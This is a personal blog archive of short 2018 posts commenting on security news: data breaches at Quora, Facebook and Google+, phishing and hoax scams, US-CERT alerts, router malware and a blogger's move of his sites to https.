Tuesday, December 04, 2018

Quora has large data breach, but it is unlikely to harm many users

Quora, a site that poses questions which users can answer, has reported a hack of over 100 million users from authorized access that occurred Friday Nov. 30.

Motherboard Vice reports in a story here by Joseph Cox. 

CEO Adam D’Angelo, 34, has written an official statement here

The passwords stolen were encrypted, which should make it harder to misuse, especially with a huge number of them.  Site speakers who had used the same pw’s for other accounts should change these.

But the stolen email addresses may make phishing spam more frequent (and I’m wondering if somehow that accounts for the Apple spam I got last week).

When I went back into it this morning, it invited me to sign on with Facebook (which is probably also not the best security now, given what happened this year).

Most users are not likely to have placed other PII or non-public material on this site.

The site keeps track of subject matter preferences.  I see a lot of questions about USCF chess ratings. 
CERT has just reported several industrial espionage trojans which I’ll have to get back to later.

Sunday, December 02, 2018

I install a legitimate iPhone app, and get a suspicious email

On Thursday, I installed the Smart News app on my iPhone.  It is true that I had to look around for the right Apple password, as I had not used it for a while.

I later got this bizarre email (shown) from a spammer saying my account was “signed on with another device”.  That may be OK, but not the sender address of “account.mail.verify.complite”.  What’s going on?

In the past I’ve gotten bogus Apple emails claiming credit card transactions in Indonesia and Belarus for materials I never bought.  And no credit card transactions ever appeared.

Thursday, November 15, 2018

Foreign espionage hackers user publicly available tools; Russians could retaliate for de-plaforming of their fake news sites; phishing for election recounts

US Cert in Pittsburgh has a collaborative report between US DHS and the British Commonwealth (UK, Canada, Australia, New Zealand), an Alert AA18-284A. about “publicly available hacking tools” seen in worldwide cyber incidents.

Most of the tools presented here seem determined to provide hidden readers for corporate espionage.
But concern persists that China, North Korea, and Russia can continue to do destructive attacks on relatively innocuous American interests, “to prove we can”.

There were some sporadic backbone router outages early Monday Nov 12 which might have been malicious.  Since US social media companies and perhaps hosts have no-platformed what they believe to be Russian fake accounts and “fake news” bots, the Russians might attack legitimate smaller interests in the US (or, more likely, the infrastructure supporting them) just to prove they can, as retaliation.

 One other thing – there seems to be some phishing spam going around claiming to raise money for Florida recounts.

Thursday, November 01, 2018

Could spammers send out no-platforming phishing notices? Also -- soft "NSA" intelligence tips when your email or social media shows unusual content repeatedly

Just a quick security tip.

If you get unusual volumes of emails, texts, robocalls, twitter mentions, Facebook postings in your timeline (or page if you allow multiple admins – a dubious idea now) or even US mail letters – about causes to which you have no connection and have no interest in supporting – just be careful, and watch your back.

It can mean someone views you as a threat to them.  Perhaps you’re lowballing them in business, or they think you are.

This goes a little beyond depending on spam filters or being careful about emails purporting to be from parties you know but looking odd. 

This is a matter that intelligence services and CIA and NSA people know well.
It’s even conceivable that spammers will send out sham “no-platforming” takedown emails (from social media platforms, domain registrars or hosts, claiming some sort of connection to a terms of service violation).  The first place to verify is the sender address with a mouseover, but sometimes those are masqueraded successfully.

Thursday, October 18, 2018

EFF advises on what to do if your Facebook account was hacked

Genine Gebhardt has a piece on Electronic Frontier Foundation, about what to do if you were caught in the Facebook hack.

There seems to be about 14 million people who had significant personal information taken. There is a risk that people could be at risk for very targeted phishing, or possibly breakins to their financial accounts (although I think Facebook denied that credit card info was taken).  A more grave risk, however unlikely in practice, could be impersonation of someone in committing a crime and framing someone. 

Wednesday, October 10, 2018

DHS, US-CERT document multiple foreign threats, not just to elections

\US DHS chief Kristjen Nielsen told the Senate today that the US faces unprecedented cyber threats from overseas enemies, both corporations and governments and even individuals. The best link is ABC’s here. The midterm elections aren’t the only catalyst.

US Cert reports (TA-276B) “persistent threat activity exploiting managed service providers (link ).  It’s not clear if this includes web hosting companies. (see also 276A, related).
There is also a new “hidden COBRA” on fast cash systems, TA-275A, link

Monday, October 08, 2018

Google-Plus shutting down ("sunsetting") after company finds potential security vulnerabilities very difficult to fix in a cost-effective way for individuals; enterprise version will be boosted

Google has suddenly announced today that it will “sunset” Google+ for individual consumers, while promoting a new version for enterprises.  I heard about this on FB Messenger from a Friend in the DC area LGBT and social media business community.

The decision is announced here on Google’s own blog.  User data will be shut down and migrated by the end of August, 2019.  The discussion is part of a “Project Strobe”.

But the sudden announcement appeared after major security lapses were reported. Ashley Carman has a story on The Verge here.
The Wall Street Journal has more details in a searing story today in by the Macmillans, here.  Apparently there was a consumer leak that the WSJ, at least, says was not properly communicated to the public.  But Google insists the security problem was found in project Strobe and caught in time.
Google reports low consumer usage and engagement, apparently in comparison to major rivals (Facebook).  Google announced Google+  in 2011 and even intended it to pursue the “circles of users” concepts even more than Facebook, but it has not taken off.
I have found Google+ useful in stimulating discussion on YouTube videos I like, particularly on classical music.  I have not used it a lot in other areas for communicating news.
This development would raises potential questions in my own mind about the long range future of Blogger, this platform, also owned by Google but completely separate from it (but available through the same Google account).  I don’t know how well the business model for Blogger works today compared to a decade ago; but I have wondered that since around 2015, as I have noticed that not that many people advertise on the blogs (that I happen to look at), despite claims to the contrary on product forums. But I don't see that Blogger could present any of the same security problems. 

There have not been that many high-profile shutdowns of consumer platforms. AOL shutdown its Hometown product in 2007 for low usage and provided a transition to Blogger. Myspace seems to be running OK. 
This is a developing story that will be covered in more detail on posts on other blogs, as there are strategic implications especially for individual users (compared to whole companies and enterprises)

Sunday, October 07, 2018

Another Facebook "friend request" hoax

Here’s the low-down on the new Facebook “friend request” scam that erupted today.

I got one of these messages in church, during the communion.

ABC News Tampa Bay explains the hoax here
 This seems to be an invitation to get the scammer to create duplicate profiles (happened to me in 2016).

Thursday, October 04, 2018

News2Share covers indictment of seven Russian hackers

News2Share journalist Ford Fischer gives a good account of the indictment of seven Russian hackers, with “Fancy Bear” and the like, in this long Twitter thread of the DOJ meeting today

Vox Sentences summarizes “The Vanishing of Kamal Khashoggi which included a coverup of doping of Russian athletes.

But the Military Times (Gregory Katz et al) warns that Russians targeted a nuclear power company in Pennsylvania, possibly wanting to jump across an air gap to a control system. 

Tuesday, October 02, 2018

Is Trump's idea of pre-emptive cyber attack making us all less safe?

Josephine Wolff offers an op-ed in the New York Times particularly critical of Trump’s interest in pre-emptive cyber attacks, “Trump’s Reckless Cyber-Security Strategy.” 
Actually, this is not so far from criticizing the wisdom of a bloody nose electronic flux (EMP) attack on North Korea in late February, after the Winter Olympics, which was argued down.

Wolff says that the Obama administration was careful about unleashing Stuxnet on Iran.  But the danger today might be in tempting foreign powers to dare trying to jump “air gaps” separating the power grids in the US from the open Internet (with so called “jumps”).
Wolff also discusses the Sony hack in 2014; but that may have more to do with some companies antagonizing certain foreign enemies like North Korea.

Friday, September 28, 2018

Facebook admits to major security breach in "view as" feature, affects 50 million accounts

Facebook now reports a major security update, which it had posted September 25, here.  regarding the “View As” feature.

Yahoo! reports the incident in a news story here.   About 50 million user accounts were affected. 40 million more were forced to sign back in as a precuation. 

Users who use specific apps could find the security of these compromised. 
Mine has not been, although I probably should reset the pw soon. 

Update: Oct. 3

Mike Isaac and Kate Conger of the New York Times  say that the Facebook hack has placed many user accounts at secondary sites at risk.  The problem is that many subscription or donor-supported sites allow sign-in through Facebook.  It's possible that credit card or PayPal info could be stolen, but there is no evidence yet that this has actually happened.

CNN has a speculative article noting that it took Facebook eleven days from Sept 16 to close the leak. It is unclear how much damage it could really do. 

Thursday, September 27, 2018

Facebook hacks cause spam messages to be sent from friends' accounts (followup)

Following up on the Sept. 20 post, I got a bizarre simple message on Facebook tonight, simply, “Is it you?” .  The message contained a music video which would not play.

The Facebook friend said he had been hacked and these spam messages did not come from him.

Earlier, I got a video from a friend in French, “I dedicate this to you” of a legitimate popular song in French.
Zdnet and Dailypost have stories on Facebook hacks that may explain this.

Thursday, September 20, 2018

Facebook messenger warns of hackers posting offensive content under the name of friends' accounts

I got a Facebook message early this morning from a “friend” in France warning of the possibility of hackers sending out offensive content under someone else’s “account”.  I don’t know yet how valid this risk really is.
“How sad is what happens on Facebook! We may end up leaving Facebook. .. In addition to porn videos, there is a new hacker on Facebook that comes out offensive sentences as comments on publications of your contacts as if it were from you. It's really ugly and it looks like it's gone from your profile. You do not see it, but your friends do. This can create offenses and misunderstandings. I want to say to all my contacts that if anything offensive happens. Know that it does not come from me.
“I ask you especially to kindly warn me.”
This message appeared overnight in French on my phone with emoji. 

Monday, September 10, 2018

Hoax virus rumor about Donald Trump's health; "young people will win" find imposters trying to sell things with fake accounts

I’ve gotten messages on Facebook warning me of pictures online showing Trump collapsing from a stroke, as email attachments.
Fact-checking site Snopes says this is a hoax.

However it’s obvious that you shouldn’t open an attachment from an email (Of uncertain source) purporting to have a politically provocative image (like “Baby Trump”) or document.

The “plaid shirt guy” Tyler Linfesty advises everyone that his ID has been spoofed by people trying to sell things.  If you get an email or see a post from anyone of the “young people will win” crowd trying to sell products, it’s a fake account.

Tuesday, September 04, 2018

"Playpen" case shows government can use malware to set up a sting

There has been some recent attention by the Electronic Frontier Foundation to malware generated by the FBI to exploit a Mozilla vulnerability and record URL’s visited by a visitor.  It seems to be acquired P2P. 

This malware may have come through P2P channels, but in a child pornography prosecution called Playpen, it has resulted in searches of users home computers, possibly in violation of the Fourth Amendment.  EFF’s strike page on the Playpen case with discussion of the malware is here. 
What sounds scary is that a foreign enemy could use the same exploit to possibly frame individuals for c.p. access.

Wednesday, August 22, 2018

DNS Propagation failure makes US-owned sites accessible only in China, where they were banned, for about an hour; possible proof-of-concept hack???

There was a problem yesterday with a major hosting service where the DNS A-record propagation failed for a while.  The end result, if you looked at “whatsmydns.net” was that the sites were connecting in non-democratic countries (particularly China) and some of eastern Europe, but in the west.

The problem was fixed in about two hours and was intermittent.  But it struck me that something this could happen because of deliberate foreign hack.  While sites, even individually owned, were not reachable from the U.S. or some western countries, it sounds conceivable hackers could have altered them in a proof-of-concept attack.  I’m not aware that this really happened, but the pattern is suspicious.
Many of these US-owned and based sites are supposedly banned in China.  It’s odd that only Beijing could reach them for about an hour.

Tuesday, August 21, 2018

Russian hackers create fake websites mimicking conservative think tanks and politicians ("Fancy Bear")

Microsoft has uncovered more Russian ("Fancy Bear") meddling before the 2018 midterms, activity which could pose a threat to ordinary users at least with spear phishing. Here is the Yahoo! report

Apparently Russian interests set up fake websites pretending to be a few conservative think tanks and even groups associated with some mainstream Republican US Senators not particularly cooperative with Trump.  Visitors might encounter malware or might get phishing emails from these fake sites.
Security companies like Trend and Webroot will be able to flag these sites as suspicious quickly, of course, but Microsoft (which runs its own Windows Defender) caught the problem first.

A couple other ideas come to mind.  Should telecoms, given the relaxing of net neutrality, refuse to let these sites be connected?

Another risk could be that in the future foreign hackers set up sites purporting to belong to individuals (even like me), perhaps those with a conservative bias.  This could set up serious problems for those individuals, but we’ll look at that soon on the identity theft blog.

Elizabeth Dwoskin and Craig Timberg have a detailed story in the Washington Post. 

Friday, August 17, 2018

Reports about hijacking of Instagram accounts and associated emails by Russians are surfacing; blockchain is proposed as a solution

I have received an inquiry for an interview with an Internet security expert who reports a problem with Instagram accounts being hijacked. When targets try to recover accounts with secured email, they find their email contacts have also been replaced with a Russian email address.

The account content are often replaced by Disney and Pixar character sets.

The contact point is proposing the use of blockchain to make social media accounts more secure.  But then blockchain could become a much more important apparatus than 2-step verification 

I suggested that the press agent have the company provide me with more details (like a URL) before I try to do a phone interview.
I will note a couple of anomalies.  I haven’t used Instagram much.  But when I set it up a few years ago I found that there was already a dummy unused account there.  This sounds dangerous.  What if someone stole your identity and used a social media service you hadn’t joined (say Snapchat) for criminal purposes?  This could be a way for a foreign enemy to wreak havoc, by targeting random Americans to be frames by prosecutors.  So the email I got points indirectly to another potential future hazard that so far is little known, although there were occasional mentions of it (in conjunction with ransomware) as far back as 2013.

Monday, August 06, 2018

Wall Street Journal reports administration scurrying now over cyber threats to power grids, which could involve home or small business users as honeypots

In early July, I happened to log on to my Dominion Power account to try to pay a bill, and got a bizarre error from the website.  The next day it worked, but maybe that’s a preview to the substance of this Wall Street Journal article by Rebecca Smith, “U.S.Steps Up Grid Defense: To fight cyberattacks on critical utilities, officials push for stronger penalties,” Online, the article is quite high profile (though with a subscription paywall) and illustrated.

The main threat seems to be that foreign hackers (Russia, China, Iran, North Korea, possibly radical Islam) get access through suppliers or small utilities, who then trade software across “air gaps” with thumb drives.  Despite the air gap from the public Internet, the security environment for major electric utilities and for grid companies (for the three major grids) is very complicated and could be breached. Small utilities and suppliers don’t have the advanced security to protect themselves from state hackers.

Another threat seems to be corporate and even home routers, which seem to be a set of “mouseholes” for malware to hide. 

The article suggests that malware (like Dragon Fly or Energetic Bear) could be hiding in utility control systems called SCADA (which, to be emphasized, aren’t directly accessible from your computer or phone). There are reports that this malware has lived on some utilities' systems since 2012. 

The article suggests that Spear-phishing, watering hole attacks on trade websites, or airgap crossing are the main methods.

The article even goes so far to as to suggest that the government is concerned about mass internal migrations should a protracted regional power failure occur (the August 2003 failure in the northeast lasted about a day).

Do ordinary users at home add to the risk?  Possibly, through home routers (which should be turned off and back on occasionally so the security updates take hold, although large cable companies probably do this anyway).  Another possibility that got mentioned shortly after 9/11 and forgotten was steganography, where instructions for terror attacks or malware are placed on innocuous amateur sites. Another possibility would be to place criminal malware like child pornography on sites to try to fame ordinary civilians, as an intimidation tactic from foreign enemies.  So far the closest that has happened has been occasional defacing of a few websites (like random restaurants) or Sony.  (There had been scattered reports (as far back of 2013) of ransomware that threatened to load c.p. on a user's computer (at one time possession would have been a strict liability offense)).  A few politically-oriented sites (in the eyes of the beholder) may have been targeted. Recently (in May and June) a major Wordpress blog (which admittedly had used an old insecure template theme) set up to advise asylum seekers was hacked, but finally secured properly and is back up. (Fortunately it had good backups  -- and backup technology would be worth another big blog post.) 

Ted Koppel (video above) wrote a book called “Lights Out” about all of this (reviewed on Books, Nov. 15, 2015).

This article doesn’t even consider EMP and solar storms, which I’ve discussed elsewhere.
As someone who dealt with the draft a half century ago, foreign enemies pose novel moral dilemmas for how individuals can be expected to behave.

Wednesday, July 25, 2018

Phishing scam presents stolen passwords in subject line, demands payment for watching porn caught on videocam

Business Insider, in a story by Kif Leswing, reports on a vicious new scam where the victim gets a phishing email with one of his passwords in the subject line. The email then tries to blackmail the person, saying it has videocam of the person watching porn, and demands payment in bitcoin.

In actual fact, the password has probably been stolen from the dark web, and may have come from one of the many major corporate hacks. The attacker does not actually have a video.

But of course you can block the camera on your computer.

Monday, July 23, 2018

US-CERT warns on Emotet Malware, major hazard for financial institutions

US-CERT has sent out an alert on “Emotet Malware”, bulletinTA18-201A, which is aimed at financial institutions and bank and securities accounts. 

It is mainly aimed at financial companies (including payment spheres and PayPal) and is often spread through phishing and affected attachments.  But it could apparently steal from consumer accounts.

Consumers should, as always, watch balances on line and pay attention to whether automated payments and the like process properly. 
But this report appears to apply most directly to employees of financial institutions.

Sunday, July 15, 2018

Site allows you to check if your email passwords have been stolen

“Pardon the interruption, your passwords are leaking”.  It’s a kind of incontinence.
So Geoffrey Fowler writes in the Washington Post Business, “StolenPassword, Here’s What to Do About It?” 

He gives a site “Have I Been Powned” here. 

One of my emails was found on seven sites that had been breached, but not on any dark web sites themselves.
Fowler recommends changing every password every 90 days with 2-step authentication and the use of really long hashed (like MF5) passwords with a professional app.

Tuesday, July 10, 2018

"Dbsync" files with 0 bytes loaded by some adware on some sites

A recent Salon article stalled when I was scrolling in Google Chrome in Windows 10.  When I viewed it in Mozilla, it scrolled fine but Mozilla asked me if I wanted to download called “dbsync” with zero bytes.  I let it go. 

Afterwards I restarted and ran a full scan in Trend Micro and it came up clean.  The file seems like a pivot got adware, which is probably not malicious but would be removed as “bloatware” by some security products.
On Google searches, Trend warns of some fraudulent anti-virus products that claim they will removed dysync.

Thursday, July 05, 2018

US Cert would do well to publish more on SQL Injection issues

I wanted to take a moment and gather some material from US-CERT in Pittsburgh on SQL Injection attacks.

The main primer dates back to 2012, and has link here. Note that CERT reports a large number of attacks in 2008 through Microsoft IIS. The recommendations in the paper relate mainly to larger organizations and tend to suggest theft of user PII is the biggest danger.

In 2016 CERT warned that SQL injection attacks might be attempted by foreign adversaries on voter databases, here

NICCS offers tuition-based classes for companies on preventing SQL injections.  Usually these mean employers send tech support staff to cities (like Seattle) for travel for several days.  

The scale of the training required makes security a difficult matter for individual bloggers to handle on their own.  Wordpress and Automattic need to remain aggressive in fixing vulnerabilities that seem to be found at times, and bloggers should upgrade to latest versions quickly when offered. This is more true now than it was a few years ago because of the tense political climate, domestically and worldwide.
Blogger has never attracted attention for vulnerabilities like this because it uses a totally proprietary database.

Wednesday, June 27, 2018

Wordpress password change on hosted sites needs a little SQL knowledge

If you blog on Wordpress on a hosted platform, the procedure for changing a user password is more complicated than with a free blog. It’s a good idea to do this at some unpredictable intervals.
Generally, you go into MyPhPAdmin, look for the database that corresponds to the blog (you need to look in the File Manager if you have more than one), look for the tables, lock for the user table, and then enter a new password and then choose an encryption method (usually MD5) from a drop down. BlueHost is pretty typical.
The actual physical password is encrypted, not what you enter on the Wordpress login screen.
I don’t get why on thus video you need to regenerate it on Wordpress itself, but I’ll look into it.

Monday, June 25, 2018

Primers on Wordpress and SQL Injection vulnerabilities

There are reports of potential vulnerabilities being found on Wordpress sites for javascript statements with “1=1” parameters (always true) that seem to open the door for possible SQL Injection attacks later.

Here’s a typical story

The statement may occur in a theme, or in the wo/includes directory.

It is unclear how they are put there.
Here is a primer on how SQL injection attacks work.

Friday, June 15, 2018

Apple fixes lingering security flaw in iPhone that enables law enforcement investigations on locked phones

My own iPhone updated to IOS 11.4 a little while ago. 

Apple has announced a security fix to prevent hackers from getting into a locked phone, but that would also preclude law enforcement from getting into one. The New York Times story by Jack Nicas is here
Tim Cook has always said that allowing anyone but a phone owner to open it post-mortem would be a kind of “cancer”.

Thursday, June 14, 2018

Security companies need more transparency in how they report customer site risk, even to hosting providers

There has been some controversy (since mid 2017) over how security companies like SiteLock mark websites as “high risk” with apparently no transparency as to what the risk factors are.
This is also an issue because security companies usually work with hosting providers who do the billing and who might have some concerns over their own downstream liability for customers (as this climate has been changing rapidly, as with FOSTA, for example). 
Forbes had a piece in August 2017 by Kalev Leetaru, and Whitefirdesign has several articles from 2017, for example this one.
There are reports of hosting providers threatening to cut off customers who experience one malware hacking attack.  There are also reports of telemarketing calls selling site security services, which would dilute the credibility of the services if the calls weren’t legitimate.
It is not clear whether site risk is based on the technical components (use of specific Wordpress plugins, for example) or its content (whether it is controversial according to the “skin in the game” theory, which has percolated for years while getting very little media attention). 
One concern is that with network neutrality gone, telecoms could (with public pre-notice first) block sites rated as risky, either bu anti-virus companies that they acquire through mergers, or even through content delivery security services like SiteLock, Cloudflare, and the like.  We already know that Cloudflare has blocked or closed accounts of some objectionable publishers (so far limited to white supremacy).
This is an evolving issue that may change with time and generate new incidents and controversies.

Friday, June 08, 2018

Should you change all your default privacy settings now?

Here is Geoffrey A Fowler’s moral lecture “Hands off mydata: 15 default privacy settings you should change right now”, in the Washington Post.  A Facebook friend shared this piece early Friday, and said he accepted he has no privacy online.
Facebook is the worst offender, but even Microsoft and Apple have their sins.
For most of us, this sounds like paranoia.  But it really depends on how exposed you are to meddling by others, in your personal living situation and employment.
It also depends on whether you are in a circumstance where people connected to you can be affected – especially if your online reputation matters in the workplace because you sell somebody else’s ideas.
We all depend on surveillance capitalism.

Wednesday, June 06, 2018

Trend Micro loops updating Windows 10 computer with creators updates, after returning from vacation non-use

On one Windows 10 computer, which I did not use for 11 days while on the road, Trend Micro update keeps looping.

I find that if I restart the computer, it says it is active and will let me run a scan.  But the icon that says an update is being installed persists. Of course, until the problem is resolved it cannot keep up with updates.

The computer that I took with me and used every day (also Windows 10 with the same latest features update) does not now have this problem.

There are various links available on Trend Micro Community, dating back to early 2017,  but I believe this could also have something to do with a period of non-use or recent Microsoft updates.
I’ll contact Trend Micro if I can’t get this resolved soon.

Update: June 12

A 90 minute support session where Trend applied several hotfixes fixed the problem.  Going not logged on for 11 days was only part of the problem.  tmqa.jp and login.me were used to that the technician could work remotely. 

Sunday, June 03, 2018

New hacking group could threaten industrial control systems

A hacking group called XENOTIME has attracted attention for the capacity to hack and shut down industrial plants, after it did so in the Middle East last year.  The threat was written up by Shannon Varga in Axios here

DRAGOS expanded with more details in a blog post here

There could be dangers to water treatment plants, pipeline controls, and maybe some power plants. 
But it is not clear how they would get into a system off the public Internet.

The name of the group seems to be related to the Pokemon game.

Wednesday, May 30, 2018

Big time malware from North Korea can disrupt businesses, maybe hack sites and capture domain names

US Cert has issued a two-part report regarding the Hidden Cobra Rat worm, as well as the Joanap Backdoor Trojan and Branbul Server Message Block Worm,  summary here.
These appear to originate from North Korea and are primarily directed at industrial companies. The description of the Rat worm is exceptionally detailed. Part of the worm includes a powerful password cracker.

I am also aware of instances where a domain, perhaps one with political significance, has been hacked and the domain actually removed from registration by hacking, after replacement with malware botss.  This is likely to be foreign and might be related to North Korea. I’ll report more details when they are available. Trend Micro and Windows Defender have reported detecting this problem.

Friday, May 25, 2018

FBI needs home users to learn router programming skills to defeat determined foreign hackers

The FBI is warning consumers about malware that can attack home routers, especially VPN.
The Boston Globe has a typical story here

Rebooting the router (from the power button, or by disconnecting and reconnecting, which causes most routers to go through the reboot) usually causes installs of any firmware from the cable vendor.  But for this malware, the reboot install may not be sufficient.
The FBI is encouraging home router users to learn how to sign on and update their routers manually, which normally requires shell scripting skills and operating system knowledge.
Comcast, Cox, etc. will soon have comments on this issue.

US Cert has a bulletin on the issue here

Sunday, May 20, 2018

Smart phone tracking and stalking a bigger problem than most people realize

Jennifer Valentino DeVries has a long article in the New York Times Saturday on smart phone stalking and tracking, here 
There seem to be dozens of apps that make this possible, at least a short distance.
The problem seems to occur the most with domestic abuse.
NBC Washington also presented a report May 17. Fox stations have also reported it.  

Saturday, May 19, 2018

Chrome will suppress "secure icon", simply call out insecure sites in September 2018

Google Chrome will suppress it’s “secure” icon in September for sites that are accessed through https (have an SSL certificate) but leave the red “not secure” on for sites that are not.

Marietta Moon writes for Engadget here.
Google really wants to push unsecure content off the web, even when it doesn’t require user signin or collect data, partly because of increasing concerns over “man in the middle” attacks from foreign sources.

Monday, May 14, 2018

New concerns surface concerning vulnerabilities in email encryption standards

Electronic Frontier Foundation has sent out an advisory regarding vulnerabilities in various implementations of PGP encryption on various email platforms. The article is by Erica Portnoy, Danny O’Brien, and Nate Cardozo. 

Some of the vulnerabilities could enable an attacker to access other encrypted emails you have sent.
A lot of the public may not feel that this issue is as important as some others.  Most of us need to encryption standards when we deal with financial institutions to buy new products (like annuities) or go through real estate closings and need to do a lot of Docusigns.

One problem seems to be that some of the vulnerabilities could be activated merely by opening an email with html enabled, even without opening attachments. 

The IT departments of insurance companies and banks will be kept especially busy

Thursday, May 10, 2018

Apple's new "Black Dot of Death": we need a fix quickly

There is a bug in IOS 11 versions on the iPhone that can cause the message app to freeze.  It has to do with Unicode that overfills a buffer associated with a “black dot” emoji ("The Black Dot of Death"). 
On Andrpid it only freezes WhatsApp. On the iPhone if freezes the entire message app.;  It is rather complicated to fix.

It could be a real problem, for example, if you are waiting for a taxi and getting messages from the taxi company.  (I don’t think it affects Uber.)

Typical story is here

It is a little unclear if it freezes the entire phone or just the messages app.  It takes a long time to send.

The demonstrator says it is easy to fix by starting a new messages occurrence.  Fox8 in Cleveland says to use the Siri app. 

The phone can overheat when sending or receiving the message.  Could this become an airline fire hazard?
Apple will surely fix this very soon. 

Wednesday, May 09, 2018

Russian hackers impersonated radical Islam, harassed military spouses online as early as 2015, well before Trump's candidacy and election

There was an alarming historical story on AP by Raphael Satter, about how Russian hackers had impersonated ISIS with text messages or other social media contact with military spouses, at least back in 2015. 

At least one of the spouses was part of Military Partners, an association of partners of LGBT service members, active since the repeal of DADT and also since Obergefell.

But the attack appears to have been part of a Russian troll attempt to spread confusion and dissension, even well before the 2016 elections and even before Donald Trump had announced his candidacy. 
This story bears watching.

Tuesday, May 08, 2018

Phishing emails asking for payment for fictitious loans

Here’s a new one.  I don’t recall getting an email before about a loan I didn’t make.

But I got an email from “elastic.co” claiming I owe a $19 payment to “accounts receivables”.  There was an attached pdf which I didn’t open. The “.co” refers to Colombia, so that’s suspicious. 

I’ll probably pull credit reports in a few days to make sure there is nothing going on. 

I generally open “suspicious” emails only on the iPhone (apple operating systems don’t seem to be as vulnerable) and don’t open the attachments at all.

“Elastic” does appear, from superficial checking, to be a real company that makes loans. I doubt this email came from them. But I did sent this on to Webroot and to Trend Micro to check further. 
I should also mention that I've gotten a few US mail letter offering $100,000 lines of credit (one of them was $500,000).  I've ignored them.  They've never shown up on a credit report. 

Friday, May 04, 2018

Twitter's little password flip; what about Facebook employees and your profiles?

NBC reports both praise and scorn for Twitter:  displeasure of the fact that uncleared workers could access unencrypted passwords at the company, put pleased that the company disclosed it.
I changed my own on a Windows 10 computer, and it seemed that it started working automatically on my phone.

In IT workplaces, security teams started to implement the idea of “separation of functions” among employees starting in the late 1980s in mainframe environments.  Programmers normally did not have the right to update production files but users did. But the maturity to respect security protocols, which protect employees, was slow to develop with many people (apparently including Hillary Clinton).
There is an issue of Facebook employees being able to access ordinary user private profiles, Wall Street Journal story.

Wednesday, April 18, 2018

Russian router hacks could even target home and small business users

Dan Goodin, of Ars Technica, has a somewhat detailed account of the recent reports from DHS and FBI and the UK’s National Cyber Security Center, that the reports of Russian hacking of corporate routers may well include small business and even some home officer routers, link.
The story was released April 16 and was reported on WJLA (a Sinclair station) local news early Tuesday.
The Ars Technica story emphasizes homeowners having older firmware and not always maintaining routers properly.  Some security experts say that cable company routers should be restarted once a month to reinstall any firmware, but I find that cable companies usually force maintenance in the early AM hours (leading to brief outages).
But some observers see this report as sinister.  Compromised routers could facilitate “man in the middle” attacks, and could provide some of the push for all websites (even those without requiring login to sell anything) to use https.  They could provide ways for hackers to steal financial data or trade secrets or to stage novel new kinds of terror-like attacks targeting ordinary people, although this doesn’t seem to have happened.  But the North Korea attack on Sony in 2014 might be a paradigm to follow.

Tuesday, April 17, 2018

More on fixing legacy webpages for https everywhere

Here is some more information on the progress to enabling https, at least on my domains.

On Blogger, the three custom domains automatically convert to https if you enter http.  The thirteen other blogs as “blogspot” simply accept https.  I suspect that Google will force these to redirect before July for the Chrome68 implementation.

My four wordpress custom domains through Wordpress all accept https.  They can be accessed with http, but will work with “Let’s encrypt”.  Bluehost offers pingbacks when you make hyperlink referenes among these domains.  Pingbacks generated after the https certificates were implemented and propagated (as positive SSL) become https.  Older pingbacks right now are still http.  If you want to review the pinged site you have to enter https yourself in the browser, then you can see it under SSL (I just tested it).  This is not ideologically perfect, but I suspect this will be OK in July.

I haven’t gone through the Wordpress blogs and converted all the internals to https, although there really aren’t that many, fortunately.  Right now the user can insert the https on older links.
Google’s link (mentioned April 1) recommends that users deploy an Open Source tool called Lighthouse  to “clean up” their web pages.  This might take a long time for bloggers with a huge inventory of legacy pages, as I have.  Ramsay Tamplin (“Blogtyrant”) made similar recommendations with a different technique that I linked to here on November 13.

I have purchased a positive SSL certificate for my verio legacy doaskdotell.com domain.  So far it has not been propagated.  There is a massive number of hardcocded links within this very old site.  They could be changed by gang edits to relative links (as here).  I don’t think I will get to this right away, however.  I’ll keep everyone posted.

It is also worthy of note that Google Blogger no longer will publish posts with video embeds that include http (as opposed to https) code. 

Friday, April 13, 2018

All my blog custom domains (Wordpress and Blogger) now have https enabled

I have updated all four (the three remaining) Wordpress blog domains and the three Google custom domains.
The Google domains were easy. You just check a box in settings for each corresponding Blog, wait about an hour for propagation, and then check a second box to autoconvert all accesses to https.
For Bluehost Wordpress hosting, now you can do multiple domains within one cPanel.
One of the domains had minimal SiteLock protection, and that one took the free SSL certificate. Two others, that are newer, have SiteLock CDN (similar to Cloudflare). For these, you have pay for Positive SSL (about $5 a month) and assign a new IP address for the domain (or remember to ask the support technician to do so – not everyone knows this yet).  You then wait for the new IP to propagage. You can check the progress of the propagation on “whatsmydns.net”.  It helps to reload it a few times;  that seems to prompt progress.  The site will go to your BlueHost panel as a redirect or give database errors on https until the entire propagation all over the world is done.  During the propagation, it is possible for foreign servers, especially, to reject your IP address, but this will not prevent the rest of the locations from working.  There seems to be at least one server for every telecom company around the world.  There are many server sites in non-democratic countries.

I hope later that SiteLock will cause the automatic conversion to https to happen.  I am told it is supposed to.   
 China blocked one of my domains (the movie reviews).  Maybe that’s retaliation for Trump’s tariffs, or maybe that’s because I had reviewed some films about dissidents (Weiwei).  I don’t think I threaten Xi Jingping’s being god-king for life. 

I've noticed that Trend Micro, at least, does not automatically mark https versions of green http sites as green; it seems to view them as new domains.  This seems illogical. 

Sunday, April 01, 2018

Google Chrome orders publishers to get SSL on all their sites by July 2018, "or else"

Google is now advising web publishers that its browser Chrome will start marking sites as “unsafe” (so to speak) if they so not have security certificates accessed with https, in July 2018, as in this story.   Google's own link is here
The Search Engine Journal offers analysis on Chrome use compared to other browsers.  But it would sound reasonable to wonder if other browsers intend to do the same.

The story (with a sublink) offers a guide for migrating a Wordpress site.  This looks like a time consuming process, but many blog sites probably don’t use a lot of the features of concern. 
Google says that the conversion is important even for sites that don’t do ecommerce or require user login.  This seems debatable.  But one problem is that sometimes unencrypted sites allow actors to insert ads (or even scareware) or possibly illegal content into the stream sent by a user, and this may not be picked up by an antivirus product.  It would be a good question whether Microsoft Windows 10, for example, could come up with other ways to disallow man-in-the-middle attacks.
Google first started talking about this in 2014, but the concern has really picked up since about the end of 2016.

There is a product called the Unified Communications Certificate (UCC) which Godaddy, for example, explains here, for multiple domain names.  But Comodo systems explains other concepts such as Multi-Domain SSL and Wildcard SSL here.  It appears as of this writing that such a product on BlueHost would still require separate cPanel’s for each domain, but I will check further into this.
I usually announce my own plans on a secured Wordpress “doaskdotellnotes” blog (it has https).  I would anticipate trying to have my other three wordpress domains secured by the end of June, 2018. 

There is a lingering question on Blogger why Google custom domains (when equated to Blogspot blogs) cannot have these certificates.  Will Google change this before its new Chrome policy goes into effect?
See the notes at the end of the Jan. 8, 2018 post here